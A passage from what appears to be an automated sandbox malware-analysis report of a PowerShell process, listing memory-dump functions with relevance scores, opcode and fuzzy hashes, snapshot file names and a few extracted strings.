                                                                                                                                Function 07D055BA Relevance: .3, Instructions: 254COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5d9dbfa9564e6baa4448f24ddd52dca1f58efadadaa985a83b0138cb6d044f22
                                                                                                                                • Instruction ID: b7edb1b7be5ad96da99e149c21fbd6ba4a9f8609c3da851c6c42bb48de7dba1a
                                                                                                                                • Opcode Fuzzy Hash: 5d9dbfa9564e6baa4448f24ddd52dca1f58efadadaa985a83b0138cb6d044f22
                                                                                                                                • Instruction Fuzzy Hash: 26A1ABB4A00205EFD714CB65D545FAAFBF2AF89318F109069D9426B7A1CB32EC51CFA1
                                                                                                                                Function 04E32B48 Relevance: .2, Instructions: 215COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 68eea5fa6393e139a707cd78f94b3a4d4dd84acb09243f40b557255659788f90
                                                                                                                                • Instruction ID: 6551438ee2d21d6503065e518ef526675037cbecb8d4c64be6c6b91226b22315
                                                                                                                                • Opcode Fuzzy Hash: 68eea5fa6393e139a707cd78f94b3a4d4dd84acb09243f40b557255659788f90
                                                                                                                                • Instruction Fuzzy Hash: 3991BDB4A006058FCB06CF99C4989AEFBB1FF88314B24859AD555AB3A5C735FC51CFA0
                                                                                                                                Function 07D0407E Relevance: .2, Instructions: 210COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 51c7fe19e18319076cc386c0d27e10893a406f401b8517d241bfada0826dc856
                                                                                                                                • Instruction ID: a0bc9704be6e9b0b33c62f1f786839cb98bd8265528041110d63c40d16c0bab5
                                                                                                                                • Opcode Fuzzy Hash: 51c7fe19e18319076cc386c0d27e10893a406f401b8517d241bfada0826dc856
                                                                                                                                • Instruction Fuzzy Hash: 49818BB4B00245EFD714CB58C950F6AFBB2AF86309F24D059EA05AB391CB76E841CB91
                                                                                                                                Function 04E38528 Relevance: .2, Instructions: 198COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a3ac04644a4460e0c44cf26b225f55e871572973539a92c58282968dd6b79342
                                                                                                                                • Instruction ID: 87dec381d0e97e3a9df6ba539ed5de175218f306c320c3d9591d63538b26ae60
                                                                                                                                • Opcode Fuzzy Hash: a3ac04644a4460e0c44cf26b225f55e871572973539a92c58282968dd6b79342
                                                                                                                                • Instruction Fuzzy Hash: 6A71BF34A01244DFCB15DFB4C8889ADBBF2FF89345B1984A9E445AB362DB35EC85CB50
                                                                                                                                Function 04E39488 Relevance: .2, Instructions: 190COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9ca62824f1f3a2369cf7a8993aba545e569a672b85ac4671f4e6dd15238ea7da
                                                                                                                                • Instruction ID: 6d437ec3c84f411679ac5ee55e0bbd93fb4efc0dbab1f70bdddd6012a62e16e6
                                                                                                                                • Opcode Fuzzy Hash: 9ca62824f1f3a2369cf7a8993aba545e569a672b85ac4671f4e6dd15238ea7da
                                                                                                                                • Instruction Fuzzy Hash: 6F719E70A00209DFCB15DF69C884A9EBBF6FF88314F14852AE419DB655DB71EC46CB80
                                                                                                                                Function 04E395F6 Relevance: .2, Instructions: 188COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 57e8bd7d9ecb0fd51dc93effddf89b7a8744063caee8d0c1b1f9ac19bf1ff4f8
                                                                                                                                • Instruction ID: e5b74f3b237d652cb0b1fed1facc78993bb1e6e4ac2b25789f0e50d424fbf600
                                                                                                                                • Opcode Fuzzy Hash: 57e8bd7d9ecb0fd51dc93effddf89b7a8744063caee8d0c1b1f9ac19bf1ff4f8
                                                                                                                                • Instruction Fuzzy Hash: F2715C70E00208DFDF25DFA5D484AADBBF6FF88309F148429D416AB295DB75AC86CB50
                                                                                                                                Function 04E3EF6A Relevance: .2, Instructions: 180COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8acc5ad6516721ec60e3c3ba971f80d7fab49d83e71d7337f39336b634e54931
                                                                                                                                • Instruction ID: aca6aacd2a87900774bb4f495c1238c0f3bb1adc787fda545ee5d378bcd5cb40
                                                                                                                                • Opcode Fuzzy Hash: 8acc5ad6516721ec60e3c3ba971f80d7fab49d83e71d7337f39336b634e54931
                                                                                                                                • Instruction Fuzzy Hash: 66715BB0E00209DFDF11CFA8D9897DEBBF1AF88319F149129E415A7254EB74A846CF91
                                                                                                                                Function 04E3EF70 Relevance: .2, Instructions: 180COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 04b745bdd3a293c0af8a9adf327eaaf3dc4a20346d76e6cdd4f344e18261e59f
                                                                                                                                • Instruction ID: 8666f42a309291419a305f27da883308d1da1c4f6634ca16a9b57ebb3d1df2eb
                                                                                                                                • Opcode Fuzzy Hash: 04b745bdd3a293c0af8a9adf327eaaf3dc4a20346d76e6cdd4f344e18261e59f
                                                                                                                                • Instruction Fuzzy Hash: E3716D71E00209DFDF11CFA9D8897DEBBF2AF88319F149129E414A7254EB74A842CF91
                                                                                                                                Function 07D09C75 Relevance: .1, Instructions: 146COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 67b98327339c3eefb15a5c46584c4e942c33c0869c9f71af0693a140703833c7
                                                                                                                                • Instruction ID: d0dfdaa6261b3b80d1231413b4cd4217c65a0d962ba73233ddb7ef51aa6f65c5
                                                                                                                                • Opcode Fuzzy Hash: 67b98327339c3eefb15a5c46584c4e942c33c0869c9f71af0693a140703833c7
                                                                                                                                • Instruction Fuzzy Hash: 8541B0F1B842519BCB1597785429BDAFF928FD1218B1C94AAD5414F393DD31E801C7F2
                                                                                                                                Function 04E39473 Relevance: .1, Instructions: 116COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9434debfc158578706c093a2855067124b7f3f59f4f0f8aa2155b879549644e5
                                                                                                                                • Instruction ID: c064e5cece29f9b8f2ebd2ab644c7f9be5301655b3f4bc256aeac0150a002f71
                                                                                                                                • Opcode Fuzzy Hash: 9434debfc158578706c093a2855067124b7f3f59f4f0f8aa2155b879549644e5
                                                                                                                                • Instruction Fuzzy Hash: 3D415B70E00208DFDB15DFA5C88869DBBF2FF84305F108429D416AB655DBB5AC85CB50
                                                                                                                                Function 04E32C58 Relevance: .1, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a21f69a9ef22c08d6a49d6a04ec0938fe530e10c04b4a2718f300054f3be58d5
                                                                                                                                • Instruction ID: 5fa849f4c1ab60a23e23ea55e5d5e6c0b89cb6a636842c7337f6c9e2bafe6127
                                                                                                                                • Opcode Fuzzy Hash: a21f69a9ef22c08d6a49d6a04ec0938fe530e10c04b4a2718f300054f3be58d5
                                                                                                                                • Instruction Fuzzy Hash: 9B4158B4A006058FCB0ACF99C198DAAFBB1FF48314B218599D541AB3A4C732FC50CFA0
                                                                                                                                Function 07D078E6 Relevance: .1, Instructions: 102COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 81aeee1759eb2ad729454c1bf2e5e36da9519a4958dc67066ddb8db792724181
                                                                                                                                • Instruction ID: 5c4e10046260faa13b5999012d8806af643497b99288366c480522a41878930c
                                                                                                                                • Opcode Fuzzy Hash: 81aeee1759eb2ad729454c1bf2e5e36da9519a4958dc67066ddb8db792724181
                                                                                                                                • Instruction Fuzzy Hash: 7D3192B4B40208AFD714AB64C955FAFBFA3ABC5358F10C424E9016F7A5CE769C418BD1
                                                                                                                                Function 07D00A60 Relevance: .1, Instructions: 94COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f894a46f1de1299af6f8ef9950775696a09559c2e60b0ab6a9514337b23de6f1
                                                                                                                                • Instruction ID: 66850ed84d18078497f14b95a0dcbfe9c1fb209edc6d91f1fb8288b4866afdfa
                                                                                                                                • Opcode Fuzzy Hash: f894a46f1de1299af6f8ef9950775696a09559c2e60b0ab6a9514337b23de6f1
                                                                                                                                • Instruction Fuzzy Hash: 0A216BB1700306BBDB245ABA8915B3BFBC69BC4719F24943AA50ACB3C5CD75D890C3B1
                                                                                                                                Function 04E3BAE8 Relevance: .1, Instructions: 92COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 08d3c6734ee8b4fbc1b49f4b26ff20e1c2fd1c6c10b50cbb3c028b066c86e34d
                                                                                                                                • Instruction ID: d564d4396e4665ffa639d94a6753282a292684a93692975a4a350b66e858ff0c
                                                                                                                                • Opcode Fuzzy Hash: 08d3c6734ee8b4fbc1b49f4b26ff20e1c2fd1c6c10b50cbb3c028b066c86e34d
                                                                                                                                • Instruction Fuzzy Hash: 0A313930B041288FDB26DB64D8557EEB7B2AF89309F1140E9D50AAB351CB35EE81CF91
                                                                                                                                Function 07D00A5D Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 62ad291eee35b67b9d9a10ceec0b6d1875029239f0e475ca410190e56043a141
                                                                                                                                • Instruction ID: 9a8e2c62ade0776b0d8cf4eb4a19d844d0eaefc8a603e5ee1760af273b71691b
                                                                                                                                • Opcode Fuzzy Hash: 62ad291eee35b67b9d9a10ceec0b6d1875029239f0e475ca410190e56043a141
                                                                                                                                • Instruction Fuzzy Hash: 48119BF170030677DB244AA68915B76FAC69BC4708F249429AA05CB3C5C9B9D89483B1
                                                                                                                                Function 07D00650 Relevance: .1, Instructions: 52COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 548f47360913578437eb626b6cd08791a4ed0c1a182a1f76c82d58fec408d86f
                                                                                                                                • Instruction ID: 2b06c7a4a166928e88de02ea3671192f9e7f070eed3648820ada71d2b5b6e366
                                                                                                                                • Opcode Fuzzy Hash: 548f47360913578437eb626b6cd08791a4ed0c1a182a1f76c82d58fec408d86f
                                                                                                                                • Instruction Fuzzy Hash: 7301477A310216ABCB24596AD400776F79BDFC1222F54C43AD589CB280DA32C845C7E0
                                                                                                                                Function 04E3EC13 Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4002709a8e9666f80519bcad5739e965f5650ae467f3f54251d6447940e7d686
                                                                                                                                • Instruction ID: 08709985f6b03a13c4eb00a77185cdf22335b7752b76395ecdf31a5fe02ade91
                                                                                                                                • Opcode Fuzzy Hash: 4002709a8e9666f80519bcad5739e965f5650ae467f3f54251d6447940e7d686
                                                                                                                                • Instruction Fuzzy Hash: B911A430D10288DFEF26DA98D59C7ECB7B1AB4571FF1425A9C001B6190AB746889CB16
                                                                                                                                Function 04E33E1B Relevance: .0, Instructions: 38COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 56e2d282c5da03bc5d690cbae62f10570049be34f8a26c707074344785fbf291
                                                                                                                                • Instruction ID: a0439418944543932d770ecf8362b96aa0e436551b72899edf0177ffeb5f5946
                                                                                                                                • Opcode Fuzzy Hash: 56e2d282c5da03bc5d690cbae62f10570049be34f8a26c707074344785fbf291
                                                                                                                                • Instruction Fuzzy Hash: 34F081B8A402149FC704CF99C480AADB7B1FF8E2007249259D85AAB325CA35EC03CB50
                                                                                                                                Function 04E3FEBF Relevance: .0, Instructions: 34COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ccc99ea8ca3eef8bc6563e667c55b6c139e8f020c95b23faa1623aa7e2cfe1fe
                                                                                                                                • Instruction ID: 98d34c468e7d6df025a3e3368044d1fdc9db73ceb066bbe3f40e02f2b0100536
                                                                                                                                • Opcode Fuzzy Hash: ccc99ea8ca3eef8bc6563e667c55b6c139e8f020c95b23faa1623aa7e2cfe1fe
                                                                                                                                • Instruction Fuzzy Hash: 48013C75E00109EFCB15CF98D8849ADF7B2FF88324B248668E419E7654C732EC51CB90
                                                                                                                                Function 04E33A2C Relevance: .0, Instructions: 34COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f8c760d07b46938e38c02af3da9da8b2bfe1ea43adb7809ef907c415d67591aa
                                                                                                                                • Instruction ID: 522b855ec205454e96c08f2a89fd1c333d0e524f8e542f565b60845e27aa92d3
                                                                                                                                • Opcode Fuzzy Hash: f8c760d07b46938e38c02af3da9da8b2bfe1ea43adb7809ef907c415d67591aa
                                                                                                                                • Instruction Fuzzy Hash: 93F03075E001049FCB148F99C8849AAF7B5FF88314B248559D999A7650C736AC57CB90
                                                                                                                                Function 07D02CA7 Relevance: .0, Instructions: 34COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a13dfe057041b042e00f364badca14a4caf516c4573ce27585a56d458cf59558
                                                                                                                                • Instruction ID: 133f4dfb7202cf8d1738df5e3b93b5223d5c776be9d0862cd84265dd3dce9cf0
                                                                                                                                • Opcode Fuzzy Hash: a13dfe057041b042e00f364badca14a4caf516c4573ce27585a56d458cf59558
                                                                                                                                • Instruction Fuzzy Hash: 85F01D6064A3818FD3169724D819751FFB1AF83204F19D0C7D0548F6E7C62AED86D766
                                                                                                                                Function 07D02DF9 Relevance: .0, Instructions: 25COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 65b0d2288a3e0653f66a541fe698fa195ca29801e34c68716bb29aca1c5f3ee0
                                                                                                                                • Instruction ID: a7dffd65aaee186d11795695a47d924a8839efc9eb550b66f07a9d4f0001783a
                                                                                                                                • Opcode Fuzzy Hash: 65b0d2288a3e0653f66a541fe698fa195ca29801e34c68716bb29aca1c5f3ee0
                                                                                                                                • Instruction Fuzzy Hash: 73E02BF42853C65BCB299B68C84A852FBB1FFA530071DD0DEE5444F1A7DA21E853C391

                                                                                                                                Non-executed Functions

                                                                                                                                Function 07D0CFC1 Relevance: 12.7, Strings: 10, Instructions: 189COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$(dq$(dq$(dq$(dq
                                                                                                                                • API String ID: 0-3791033070
                                                                                                                                • Opcode ID: 56f9db9b292bfda02c231e912365fe80572a796ac2c4374b602beb865489e113
                                                                                                                                • Instruction ID: 414a594885630df6bfb79294c23c7e86b171ec7b48d0e45be506395df3cdbde8
                                                                                                                                • Opcode Fuzzy Hash: 56f9db9b292bfda02c231e912365fe80572a796ac2c4374b602beb865489e113
                                                                                                                                • Instruction Fuzzy Hash: C661C6B0B401159FC7249FA98904B6AFBE3BF89714F25945AE8056F3D4CA31DD42C7E1
                                                                                                                                Function 07D0C753 Relevance: 10.1, Strings: 8, Instructions: 118COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q
                                                                                                                                • API String ID: 0-1509595670
                                                                                                                                • Opcode ID: d9dea08f803afdcfa1b553545ceb05f05cbee21a6b28a685ac1139148145b140
                                                                                                                                • Instruction ID: 454c17109a9e504495ba44b56683b697cc1dd2a04d26b7d60e7f2786cdb503a6
                                                                                                                                • Opcode Fuzzy Hash: d9dea08f803afdcfa1b553545ceb05f05cbee21a6b28a685ac1139148145b140
                                                                                                                                • Instruction Fuzzy Hash: 994115B0B502059FC7289F698404BAEFBE2BB88714F249659E8499F394CB31DC45C7E5
                                                                                                                                Function 07D017E0 Relevance: 7.6, Strings: 6, Instructions: 139COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$t~qq$$^q$$^q$$^q
                                                                                                                                • API String ID: 0-2923853403
                                                                                                                                • Opcode ID: 7c272a48831e03f4777cc88fd66118210771b7ab3bc9e862381c54495ce39444
                                                                                                                                • Instruction ID: e77f74232664c5dc2419505ebdee51390ae0dc2cfeedac873111fb871937a569
                                                                                                                                • Opcode Fuzzy Hash: 7c272a48831e03f4777cc88fd66118210771b7ab3bc9e862381c54495ce39444
                                                                                                                                • Instruction Fuzzy Hash: E64149B1B0021FABCB285AA5945437EFBD6ABC6310F24586AD4818F2C5DE32C98583D3
                                                                                                                                Function 07D08128 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                • API String ID: 0-2392861976
                                                                                                                                • Opcode ID: 65fb4ec91bfb1e92665f56cd5880c1ebd2dd2e5acf61bd77d65fa97db4a4ab33
                                                                                                                                • Instruction ID: f5f6cf26d8ad3e987235c611765c8d7de1f650c6cf5f12d9d8dc1a56b8711abe
                                                                                                                                • Opcode Fuzzy Hash: 65fb4ec91bfb1e92665f56cd5880c1ebd2dd2e5acf61bd77d65fa97db4a4ab33
                                                                                                                                • Instruction Fuzzy Hash: 7A3137B6B043478FDB394A759854366F7A1AF82610B14687FC4828F3C5DE36C459E3E2
                                                                                                                                Function 07D02224 Relevance: 7.6, Strings: 6, Instructions: 56COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                                                                                                                • API String ID: 0-3669853574
                                                                                                                                • Opcode ID: c814452d33e8765a497c4ccf167988e1f2886a5f10a371b4c10620bbc7ff7e2d
                                                                                                                                • Instruction ID: a046a02bad6600cf3e0fa5e5982573971c0d36ff657e69e6ac5e4af3c9f17023
                                                                                                                                • Opcode Fuzzy Hash: c814452d33e8765a497c4ccf167988e1f2886a5f10a371b4c10620bbc7ff7e2d
                                                                                                                                • Instruction Fuzzy Hash: 4B115971B0621ACF8B294EF9940C769F7E17F86720724616ED8448F3A9CB31EC8583C1
                                                                                                                                Function 07D0D585 Relevance: 6.4, Strings: 5, Instructions: 195COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                                                                                • API String ID: 0-3997570045
                                                                                                                                • Opcode ID: e20cd9b60f39a1f8721559b0e7af51640c6c10a1b42291cb77978b313699a060
                                                                                                                                • Instruction ID: ae92b578205d31848d824a55646b5208339e80e1a7c71f810f703776d7361979
                                                                                                                                • Opcode Fuzzy Hash: e20cd9b60f39a1f8721559b0e7af51640c6c10a1b42291cb77978b313699a060
                                                                                                                                • Instruction Fuzzy Hash: 6961D2B4B0020ADFDB288E94C5487AAF7B3AB86315F58A457E8455B2D5C731ED80CBE1
                                                                                                                                Function 07D02AD0 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
